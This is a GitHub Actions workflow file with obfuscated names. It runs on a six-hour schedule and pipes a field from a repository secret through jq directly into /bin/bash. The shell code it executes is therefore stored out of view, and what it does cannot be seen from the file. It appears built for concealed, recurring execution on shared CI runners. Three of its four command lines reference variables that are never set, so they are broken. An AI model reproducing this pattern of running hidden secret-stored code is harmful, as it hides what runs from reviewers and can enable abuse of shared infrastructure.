name: iosshuchu

on:
  workflow_dispatch:
  schedule:
    - cron: '50 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: iosshuchu
        env:
          jpvnw41172: ${{ secrets.jpvnw41172 }}
        run: |
          echo $jpvnw41172 | jq -r .k0804 | /bin/bash
          echo $by6133 | jq -r .hxf009 | /bin/bash
          echo $jfdde404 | jq -r .nk11 | /bin/bash
          echo $y2 | jq -r .y10841 | /bin/bash

